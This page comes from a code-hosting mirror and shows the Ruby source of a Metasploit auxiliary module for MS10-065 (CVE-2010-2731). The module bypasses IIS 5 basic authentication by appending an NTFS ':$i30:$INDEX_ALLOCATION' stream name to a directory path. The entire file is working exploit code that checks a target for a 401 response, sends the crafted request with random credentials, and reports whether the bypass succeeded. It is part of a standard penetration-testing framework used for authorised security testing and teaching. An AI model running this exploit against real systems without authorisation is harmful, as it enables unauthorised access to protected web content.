CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/iis_auth_bypass.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',

14
        'Description' => %q{

15
          This module bypasses basic authentication for Internet Information Services (IIS).

16
          By appending the NTFS stream name to the directory name in a request, it is

17
          possible to bypass authentication.

18
        },

19
        'References' => [

20
          [ 'CVE', '2010-2731' ],

21
          [ 'OSVDB', '66160' ],

22
          [ 'MSB', 'MS10-065' ],

23
          [ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]

24
        ],

25
        'Author' => [

26
          'Soroush Dalili',

27
          'sinn3r'

28
        ],

29
        'License' => MSF_LICENSE,

30
        'DisclosureDate' => '2010-07-02'

31
      )

32
    )

33


34
    register_options(

35
      [

36
        OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])

37
      ]

38
    )

39
  end

40


41
  def has_auth

42
    uri = normalize_uri(target_uri.path)

43
    uri << '/' if uri[-1, 1] != '/'

44


45
    res = send_request_cgi({

46
      'uri' => uri,

47
      'method' => 'GET'

48
    })

49
    vprint_status(res.body) if res

50


51
    return (res and res.code == 401)

52
  end

53


54
  def try_auth

55
    uri = normalize_uri(target_uri.path)

56
    uri << '/' if uri[-1, 1] != '/'

57
    uri << Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"

58


59
    dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'

60


61
    user = Rex::Text.rand_text_alpha(rand(5..14))

62
    pass = Rex::Text.rand_text_alpha(rand(5..14))

63


64
    vprint_status("Requesting: #{dir}")

65
    res = send_request_cgi({

66
      'uri' => dir,

67
      'method' => 'GET',

68
      'authorization' => basic_auth(user, pass)

69
    })

70
    vprint_status(res.body) if res

71


72
    return (res && (res.code != 401) && (res.code != 404)) ? dir : ''

73
  end

74


75
  def run

76
    if !has_auth

77
      print_error('No basic authentication enabled')

78
      return

79
    end

80


81
    bypass_string = try_auth

82


83
    if bypass_string.empty?

84
      print_error('The bypass attempt did not work')

85
    else

86
      print_good("You can bypass auth by doing: #{bypass_string}")

87
    end

88
  end

89
end

90


91